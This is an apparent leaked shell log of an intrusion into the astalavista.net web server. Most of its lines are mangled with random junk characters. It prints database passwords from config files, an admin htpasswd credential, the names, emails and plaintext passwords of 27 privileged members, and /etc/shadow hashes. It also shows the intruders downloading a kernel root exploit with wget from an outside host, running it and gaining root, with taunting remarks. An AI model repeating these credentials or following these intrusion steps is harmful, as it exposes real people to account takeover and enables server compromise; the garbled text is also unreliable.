0 H. h( e- h$ _, n, idrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner L6 T3 C$ t& l1 a. e; x8 A' u6 E1 N
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg/ y R! M" z- w+ I, m g9 U8 x
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
3 i5 H# P/ y N0 J% D B% t8 pdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron* r! v; V: h2 T$ q: \. z
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd# k8 v0 y3 ^5 N7 k+ | [4 z
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php/ P+ K7 ^$ L' S+ ^0 W$ Q
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
- l8 Q5 R3 s* s) qdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed' I6 J8 k8 P/ u2 n! f, S' h/ l
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour& P6 }4 ]# Q1 X' n! ~' h
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess5 q ]' @* a1 F, g# r" m
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
2 i( W; y6 d# f7 m x- |3 q( w-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php w: x- g8 z9 f$ ~( V
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
* t0 K: p6 a# F3 K: l8 m-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php0 j" \0 W+ J$ ]" W
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php D; P% M% ^ g# n
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
8 ~% ]2 i0 W( M9 ?: \drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc2 C3 w z8 `, x [$ | C
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang" x V/ l5 s& g" [' M2 E' D6 t
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
; v a& p/ @2 w- W+ Xdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
2 t7 v: R$ h* R+ ~4 b* }0 Edrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member" V3 u/ i! A% t+ V p. t. Q H
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
$ A) A; l* S* x5 X) gdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
6 Z5 K. g( p, P4 q0 s-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf, I% I5 }; P. ]# e. t
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
?8 P+ A1 X, t-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
2 i5 z" X, K: K4 M6 x. f4 [$ kdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
% d0 }- _+ \9 \0 zdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
+ V5 [1 {$ D+ U, F5 hdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com- ]! [. Y, n2 D! `
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
- u& G6 Y3 C) N" m. j y+ O+ X! Jdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src5 F" @8 ^: O& j% i& a
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
4 b, t: ] c3 i( n' F' S+ tdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
4 e: m) p9 M# ^) a4 cdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
6 ]" n9 M- ^. q3 m, ?" P-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php' D" b Y, d3 a; `
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki1 T+ {! a5 ]* U0 |9 `: \
3 E% Q/ I, O" M& m6 i/ s' vsh-3.2$ head -20 index.php
- O* k G$ c5 C& E1 f<?PHP
9 {# I- A$ ~% M2 m, o- o/**
4 @. M/ {) k3 w9 \! j: K* Mainfile (external) for astalavistaNET v2.0
4 p7 ?; z# u, N( z$ d B' s*# c3 O& |7 Q' x
* @copyright Astalavista IT Engineering GmbH
" w' y3 d6 ?( z: C* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
/ v6 h! k) p, E m9 a" ~6 ~* @version 1.0; U1 K3 b# G y; [, e
*/+ H" {6 D Z9 E) J
! U1 M$ o. ]& @, O7 E; K1 l
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
, R I( U+ l) g# a! W' B% R $dontStartSession = false;; u& o5 d& y; l; o8 ~
} else {0 h2 |# O, n5 P1 W6 P0 |
$dontStartSession = true;
( a3 e' p, Z$ T5 x/ d" N }% A) x }- w/ n2 d3 Q
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
) J% \* d, D, o, a require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);9 b5 R0 w8 ?& N% x
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
6 [; W& T5 L8 n4 R require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
" T( A" _- R" }7 s/ j
, y) }; q! Y( u/ I1 ?: B$ O {* X3 p% psh-3.2$ cd config8 @! q% g+ A: H3 }
sh-3.2$ ls -la
. o8 ?4 K6 T* `4 I. f4 jtotal 324 V3 i& r9 i3 g m2 S) w
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
* \ T, `0 S0 Q1 a# q H/ ~: Bdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..: r7 I4 m- z7 X2 h2 A: D1 ~
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php* x% E3 ~% _3 H4 y" M; k
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php3 w- T# a: l8 j1 h+ w; I0 O
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
; S8 P* S3 c; L& I9 I7 @! F-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php4 ?6 \/ J! l/ |
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php& _) m8 F& X$ H2 E
- j: t) h, ?1 b
sh-3.2$ cat com.conf.php
/ R. N* i) I7 n[snip]+ f ^3 C: ^' W1 F; g
//member-database3 z8 U' n+ f: d: C( u r* {1 L3 y
$_CONFIG['db_mem_server'] = ‘localhost’; I! g' Y* a+ [! C) l
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;2 b1 g) T V7 ]% u3 z
$_CONFIG['db_mem_user'] = ‘astanet_db’;, H* E4 m9 h8 N* O5 ^1 m! [
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;) E, P" b* g9 E6 R! R9 ]
$_CONFIG['db_mem_debug'] = false; //true or false3 D, E6 ]8 k; H- T( l9 J4 q
//ads-database
6 p* O5 h& F( G- M+ O6 t& h6 x$_CONFIG['db_ads_server'] = ‘localhost’;8 o0 p4 b$ `+ A5 t# r; m) r
$_CONFIG['db_ads_database'] = ‘astanet_ads’;" y% ^; H6 L$ F
$_CONFIG['db_ads_user'] = ‘astanet_db’;
, U3 F4 E3 B% g4 s& x$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
; V$ \- j" G) ] H8 p( w7 I$_CONFIG['db_ads_debug'] = false; //true or false
6 A, O O M1 d2 U. ?4 X p) G//rainbow-database
5 Y$ M; ~0 e; @; `$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;9 i) U$ s4 J% |0 T; Z. @
$_CONFIG['db_rainbow_database'] = ‘rainbow’;. V. b3 ?: \% H, a3 D+ g
$_CONFIG['db_rainbow_user'] = ‘dinu’;
. h) h2 C$ m" L! M$ }4 w Z. {$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
+ v! ~6 t y$ A, w* G) R7 k$_CONFIG['db_rainbow_debug'] = false; //true or false
6 K0 n7 T& g5 n: C+ L//mailing lists database: K1 M; y- a _5 \" r
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
' D! Z& N. }+ R5 y* c0 ]- S$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;" y& h, a$ N; V- d6 ]& u
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
0 [+ M6 z0 d$ E! V2 `: X* `. \' j$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;0 v: _0 c7 L3 D( x$ n
$_CONFIG['db_mailing_lists_debug'] = false; //true or false/ M# r8 r' `2 n9 K2 R4 b; X
//paypal! g8 Q p* Y! k7 E4 H
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;9 I$ M; K6 D! c. c( o! P& r1 L
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;# N* d. ]/ S! G4 u$ t
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;5 ]0 U) W2 i- Q8 T% v/ F& ]
$_CONFIG['sub_pp_noship'] = ‘1′; X# K. ]- O1 l/ h
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
: [+ ]4 ]/ q+ r$ R[snip]
% G/ i% O0 u7 C1 f$ A0 V
$ a0 C. y* R2 g- B9 d. [sh-3.2$ cd ..6 V6 D8 F2 d) m3 m
sh-3.2$ cd member5 z1 A+ H, ^" D$ X i* v
sh-3.2$ ls -la& h+ d! j' T5 f
total 20
( G6 o- r7 R4 K$ B) pdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
4 \& h6 g& B* f Z- ^8 Odrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..9 M2 A* m1 K6 [1 p* ?3 k% ^% b. \
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
, z7 w% a& B5 a+ c. ?; p-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
! U- O2 V5 y% }* j M) x7 m Lsh-3.2$ cat .htaccess
# L, X5 s' X8 g7 Y3 _2 hSecFilterEngine off: O) U3 `! C3 H0 \7 K" Y
9 x4 m) W T5 U3 ish-3.2$ cd ..; n: v: l8 x8 I
sh-3.2$ cd cron
& f3 k K1 a' o9 t$ V6 hsh-3.2$ ls -la
7 O: i- Y. l) J/ ?total 168# l5 ]4 v- ]" l8 v5 D
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .. c) t; h2 E4 Y K: `2 M2 b; a
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
* m- n3 q- q$ Y9 h8 U2 Z- W& h- L4 M* T1 O. z-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
5 X3 `& f) [4 ]0 K- \6 q5 A% S-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php8 y6 m; b8 c+ }, G) h
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
' V) I/ `% j) D- e7 A- b$ E6 \-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php3 w3 |! f" ?! r6 E6 {
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
]7 I& l6 X7 T' z-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
D! d9 B% ?$ y+ p-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php/ m7 w s4 {. N* ]9 j' H) O
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
8 y+ \+ c) h$ G1 Z-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh3 m, x9 ^4 e8 M; R% _
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php6 [" Y8 F3 M9 u* @- ]' A n( T
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
; t# d7 P1 ]8 F0 u% t-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
' g0 @; o7 q. O+ y7 G0 n-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh: e" U& H2 K ?7 H6 q6 F( x
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
3 Q0 K1 x9 G6 U, c5 T) E-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php) v9 t8 d v i( a- C2 l' ^3 |
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
0 b2 K+ A) n3 |( N9 e4 I- K-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php; A; K5 h& C* H+ }- z# N0 D
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
6 w% g3 \& [# R9 y& ]; _) H# Wdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email* q) m: r0 r/ X$ x ?2 N
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php4 G8 W2 s% L" p4 A+ C5 P
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
8 {" _# ?4 N3 c; f8 n; f J: R; u P, f0 v: a% B, B* N& n
sh-3.2$ cd ..! F5 {: g4 v+ o* f2 _4 h$ P7 l" u, H
sh-3.2$ cd _007, H4 t! ^- w G& o, w
sh-3.2$ ls -la) V0 a. ?% P& P0 p$ q3 X
total 24
/ ?# J% F0 D& E2 u/ S5 S+ ^% G& }* |drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
: J7 Z8 e9 w/ K, d! j xdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..5 S3 R+ c% K6 `: `3 ~
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
; }6 Z6 L" f: g7 \3 z5 Y& H$ A-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php9 J6 w# }+ d ]) D5 M
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
( n% K- ?# A) D1 O! f2 ndrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
' i; b* `, r& p. Q" K" a) A4 F
& E5 P0 ~/ S2 Qsh-3.2$ cat .htaccess
0 F/ z* u8 L7 |% C7 E0 ~authType Basic2 D7 G: D6 B/ b7 A% S
authName Admin
8 `7 J- Y4 g m, B4 gauthUserFile /home/astanet/auth/.htadm_pwd
0 N7 U. L+ Y3 G. h, ^. h: Brequire valid-user
6 W0 t! F+ M2 A: ^/ m, l0 m' d
# z. R& u2 @5 C# |; zsh-3.2$ cat /home/astanet/auth/.htadm_pwd( Y V& j) @3 t' c9 ~/ m' S' R
admin2net:CR0bl65MwhfT
% b6 O5 g! m9 ~* h; y9 S- C7 b. W
( T$ `' f# V% V; t5 Esh-3.2$ mysql -u astanet_db -p
4 P& E' @* K- D) J: `" OEnter password:
. p4 Z& X L1 VWelcome to the MySQL monitor. Commands end with ; or \g.& T3 R1 |$ p# r# ^5 G
Your MySQL connection id is 2751532 `/ R t& @* @7 E( `6 t) Z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* ^$ B8 u1 Z$ A# _" h9 W5 x' \7 G& i" { i5 M9 u& D
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( w! [ X1 g2 R
0 q3 M. F# ^ T" N l' o
mysql> show databases;; t1 Y6 N8 E1 J6 `
+———————–+- H, `# f8 o, n0 k
| Database |
! f' z9 r1 @9 y7 T4 Q+———————–+' Z1 o8 R& f$ I6 P
| information_schema |
) n1 C# H' m( P! O+ s, X6 _: P| astanet_ads |
) L0 [# I6 T& a" J i/ [0 {7 @| astanet_mailing_lists |2 C5 Q/ q" q' p N: m
| astanet_mediawiki |1 U! z& ?9 Y! p: N9 L+ f8 i N
| astanet_membersystem |9 W1 n! z9 |1 z. I, \2 @8 G
| test |4 H2 j; Z" _/ C6 y7 V
+———————–+* u0 B; E( [7 s; @( t' S
6 rows in set (0.00 sec)
" d* z! O1 @2 _/ u; w- [* X$ j: c& l1 v: Q. I* a8 L3 o
mysql> use astanet_membersystem) L1 e6 Z7 h8 r, h) L: o8 z
Database changed
7 w, G" }# H4 Emysql> show tables;- z1 n- _/ M( A- u
+———————————–+. o# `+ W9 U/ B
| Tables_in_astanet_membersystem |8 T* x; K: r( f+ y2 ^ F5 ^
+———————————–+
4 H& n* P( U( |9 X5 X2 h| blacklist_categories |1 [4 \4 Z6 u6 _* W* O
| blacklist_content |* Y9 e+ O T; n6 y* _& r
| blacklist_levels |! n( R5 {2 d* Y0 U" K* F
| blacklist_mcset |
4 E( b$ U/ q1 a9 p| dir_categories |7 ]6 ~2 U& W( F; G6 A
| dir_comments |, G& \5 Z6 m- ~& U( u
| dir_links |
6 l! w& f( l/ Q0 c& Q) ~| dir_temp |' i8 v t7 F+ w$ [
| dir_votes |
8 {1 L B1 @* m& m$ S3 X| documents |
$ d& h$ V! G, e3 O- T| documents_categories | V$ i4 b0 q$ x* M0 N9 ^+ l
| email_content |& D7 T* a8 X: Q1 q1 Z4 ]6 \! b4 q6 y
| email_settings |
[( j' ]# A0 H& d9 n. W4 [| exploits |4 Z9 h, C7 E- F! a
| exploits_categories |1 y. V7 Q% a9 |: r2 }/ d
| exploittree_categories |8 M4 l V0 H7 N8 P5 U- X* v C
| exploittree_exploits |. \% a6 H' E" [3 M7 w1 F
| home_values |" s" _0 L2 |7 P A( R! m" k8 f! i
| iso_countries |
8 e0 K# {, ~; U0 w6 N/ H/ H| links_categories |
" ~% W) c) D9 H| links_records |
# z, { p# b5 g7 d* A: m5 b| links_unauth |
5 P' D# Y' m( B0 p. k9 @9 [6 }. |* g| links_votes |
" `( Z' r# Y. C3 \: }2 R, x: K| log |+ h7 O! U& R- U) B- k+ W# m* v
| news_categories |0 J9 u) v2 F1 {* u. a: T# @( J
| news_comments |
& e8 N% A8 o$ t$ R" |' G J| news_emoticons |; ?1 S6 Z6 e' F, G: v3 D
| news_latest |" K* D4 {* b7 s
| news_messages |. i9 p, y7 P l9 Z3 Q5 J4 O! g
| news_statistics |. {" H w; l$ g. A+ U
| news_votes |
+ @. p; Z" P0 ~0 \| prices_content |
1 X+ E( E: K' `( S0 Y| prices_offers |
# e: k. J' h/ I| rss_settings |+ q: v+ D% b/ n; T0 O5 M, u' k% z
| sessions |
6 }4 p; n9 m) y' V| stats_signups |
! P c- S% e3 q3 i& y6 R| u2u2 |2 S- ~5 H* p3 v
| u2u_contact |
9 u( t4 N' V/ r3 E" p' H( q| u2u_settings |
% @4 T/ E. m; V5 A% Q5 u) w. \| user_keywords_selected_categories |
' h+ x, ~1 g/ ?! o; x% I| users |
" L8 d: e& B; j k( t, h| users_ipn_test |
! X) V0 I0 K4 k( h| users_keyword_values |: Q* {# z; {& a! f4 K
| users_profile |/ J& P/ h0 z7 r4 ?0 d6 j
| users_temp |3 Z- r& I5 Y) B) Y8 n5 \
| users_upgrade |' u! X, X, h' q' h# j& V P z
+———————————–+
0 j. Z" j3 r. [! \' l, S46 rows in set (0.00 sec)* N3 G$ [7 Q: J2 y' A6 O' T5 K, y8 o
( v% B* j& [! [: B, D8 \. c
mysql> describe users;
0 B3 D4 c6 c# c; @" m6 l+ _+————————–+————————————–+——+—–+———————+—————-+. C* K4 F! I% `( }) W5 A6 w( q# r6 S
| Field | Type | Null | Key | Default | Extra |
" H' i4 G9 T$ s) y: S" x+————————–+————————————–+——+—–+———————+—————-+
2 M* h- x* y7 Z$ t( J" X| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |# g( w2 m, A: _/ r6 z2 i, F3 E
| user | varchar(50) | NO | | | |
0 o- |+ W/ v0 P| nickname | varchar(30) | NO | MUL | anonymous | |
0 r5 D, l3 O$ e& U| password | varchar(30) | NO | | | |
; f& C# y' C! |, l| userlevel | tinyint(3) | YES | MUL | NULL | |
/ G9 T- R+ P' P, }# u+ n0 n, l| exp | int(8) unsigned | NO | | 0 | |
- U6 E% f/ P2 t% _: V& R: {1 P| email | varchar(50) | NO | | | |
8 X/ r: [1 F: N' T* _5 c; u| ip | varchar(15) | NO | | 0 | |
7 f. R* s. F) W) D, J: L' r- \| proxy | set(’0′,’1′) | NO | | 0 | |
+ W0 z' y! p% k! w5 d0 ~- r J| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |2 `; ?+ M( M) U/ V$ B) ?
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |4 R8 f, w! P4 j: ?, y. w
| anz_in | tinyint(1) | NO | | -1 | |
9 t5 Z# C% D/ m0 |$ K( G8 K| status | tinyint(1) unsigned | NO | | 0 | |
8 K1 K* G5 O% O, L| checked | set(’0′,’1′,’2′) | NO | | 0 | |
# K- A! l$ y) c$ Y) r| freemember | set(’0′,’1′) | NO | | 0 | |
# }& X' D; b1 }' t( i+ U) a. ?9 @' w( G| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
- y% @; [" V+ L, e% I6 M, J5 M9 T| lang | tinytext | NO | | | |0 q- w: Q0 J7 F7 D% I3 s
| adid | smallint(6) | NO | | 0 | |# }- [0 R/ E! B- t; U! b4 B- N
| pp_txn_id | varchar(255) | YES | | NULL | |
' T4 F# k; i( g p' ?| cnb_transaction_id | varchar(255) | YES | | NULL | |. B0 f# \4 ~ B; e
| cnb_order_id | varchar(255) | YES | | NULL | |- A5 w5 {9 i) R1 a
| cnb_user_id | int(11) | YES | | 0 | |5 p: t* y8 `0 L0 Q
+————————–+————————————–+——+—–+———————+—————-+
9 L/ G+ ~% Z' n- n* P1 `22 rows in set (0.01 sec)
( L7 A( G X8 \3 A- @4 p/ g5 ^; |' C! u0 B
mysql> select count(*) as skids from users;& v1 e- p. _% W! G" G$ Y2 Z
+——-+, O( A" W7 u% @8 N3 @+ P
| skids |# N7 R" s- _ u# ?
+——-+
" f& E8 E. n* x$ P+ v( C| 25199 |: i/ i# \ I2 M: `9 Z5 d& G' Y
+——-+' L7 y& F* [/ [$ Z2 _- j
1 row in set (0.00 sec)
- L: t! m4 f w/ J, L0 n7 U* ?
/ Y1 L* Z$ y( e8 v1 a# G; ~mysql> select user,nickname,password,email from users where userlevel = 1;: V' }6 w5 u' V5 x4 e1 F6 t
+————————–+———————-+——————+———————————–+% N' B0 a5 B6 S1 j; o
| user | nickname | password | email |% }: T$ j6 r0 O& `4 k- E
+————————–+———————-+——————+———————————–+
8 p* x+ j6 E- c7 Y1 u I| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
7 e& \5 X3 F2 d, \6 L# h| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |1 ]9 {2 O$ y4 z# H, w
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
+ D/ S p. q) ^: ?8 H% B1 O| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |- _7 w/ l. _1 i) v2 D8 h
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
: D" T7 B) {/ T- s6 g. Y; Y| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
9 X% q t F! r* y W9 X7 P7 R| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |! W' R8 N# h; g* }4 {5 L7 l
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
+ n6 B6 t: M) r7 @& p3 u6 q0 j| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |% i6 L, B9 A' U' K$ G1 s
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
, _7 |7 D6 u2 R; A| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |2 \) j) E0 H2 Q- t
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
# t9 {2 {4 |! \# j) j' ?7 Y# P| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
% }$ J' q) Q) N| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
3 P" Q# v; N* i$ y| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |5 D5 g: L& f j1 e, Y
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |4 z- z9 e' y4 C" l
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
# N3 T4 _ d' u, E| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |* i. `- O5 s4 f0 ]5 |
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
9 r2 V( u8 n( ~2 f) K| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |8 e" r. V, j( a \
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
: A7 u/ D( n& O5 U| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
i' ~$ t; X* F+ n6 s: L2 X| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
% D: p- m% G2 F, S' || developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
; p g; w3 }# E1 }7 r+ ^; n| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |3 }# H6 E$ @' t% Q) u- B
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |$ _# V. e1 ~2 E+ H1 J* W1 o
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |1 Q# H+ n3 @4 [ {6 [* b
+————————–+———————-+——————+———————————–+5 |6 ?% B3 n8 z% f$ h
27 rows in set (0.00 sec)
. V* p" T( x+ m4 O
) o6 L; x m$ F* C& P6 c5 Tmysql> exit;
) I$ _) ^1 B& o; C) M9 E/ ?! L8 x3 y! YBye
7 }) r' b/ D& x* M; |. i7 N1 w
2 u" G0 `0 f+ t/ n[~] plaintext passwords? yes,4 M: M- W4 X: V' x5 Q) N
Those so called “security professionals” who charge you $6.66 / month to
1 l5 \( h( Q5 B4 T/ Sregister at their hack-proof portal, save your passwords in plaintext…
- i' `7 q( b# gbrilliant!
$ Y7 j. y/ F* O
& g8 E: L @' A1 d[~] This been fun but we want more.
' I% G: z" Q8 @$ \& ^$ v& ^1 _& @3 |3 H6 w5 v3 a
sh-3.2$ uname -a
4 [. G0 V, q' j kLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
& |" B' R* ]4 k) g$ t6 csh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
& x# q# a8 b, [* X: w9 ]! E% b–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]1 A& R$ {* t: ]9 S; o6 x
Resolving anti.sec.labs… 13.33.33.37
3 u2 d0 u7 l8 X: _* i1 JConnecting to anti.sec.labs|13.33.33.37|:80… connected.
/ r8 U) ]& o- x$ r nHTTP request sent, awaiting response… 200 OK
7 R3 D$ h9 a \. |5 J( tLength: 18200 (18K) [text/plain]
" e$ x2 |4 L, |, R! d5 y1 pSaving to: `g0troot’
, D# s1 ~* a9 g; \% p
: b3 Y7 Q- |" e8 z! {2 P* L8 F100%[=========================================================================================================================================>] 18,200 58.6K/s in$ j# c, M% z( V( K' h0 [8 r
0.3s
+ j; n* V4 ?% z0 {4 O5 ?) S( f( Z7 @6 ^6 G! X V+ h( w
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]8 Q3 F# y' E% f2 d3 b- K' n; W
5 z/ E+ u0 K: A; h% O) X4 Y8 {sh-3.2$ ./g0troot -i x86_64
% F) r0 e0 A7 N8 Y[+] g0troot - anti.sec.labs! s- H+ E8 s; V( D6 L8 S
[+] Target: 2.6.18-128.1.10.el5
9 }0 g7 @) P1 G" I$ b ]. l. m5 D[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]# W5 L! `+ o% T9 O
9 S: ~# a- \* |4 F
[+] r00tr00t
. C0 ^2 Y; Z2 D3 c$ D& L[~] Executing shell…3 A1 T8 H; B4 S$ @+ t( ~
9 H& ?: h6 C/ U2 ~& i9 V3 }sh-3.2# id
/ U$ [! |+ `* n- o% e# nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)) L: Q( r( [; B- ?5 T
; g' n: J$ q0 }* w6 j2 c }
sh-3.2# cat /etc/shadow, D% l2 k3 u! d8 K, N
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
) j; U/ t3 {% n& m; N9 z[snip]
* S# [, t% Y* P. J8 ]; C {( Tadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::) D% o" K: F m( T
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
+ g& ~5 X; ]: y$ \ `/ F6 bcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
% r% k% c+ b7 zastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
' ^2 C, p' g: t. ], ] T7 q
* M& d, z; C. r. E2 hsh-3.2# cat /etc/motd
/ `$ b* B9 g" L8 V) h7 e% Y#####################################################% |0 F& K) W6 m8 p' }7 E5 ~) w! x
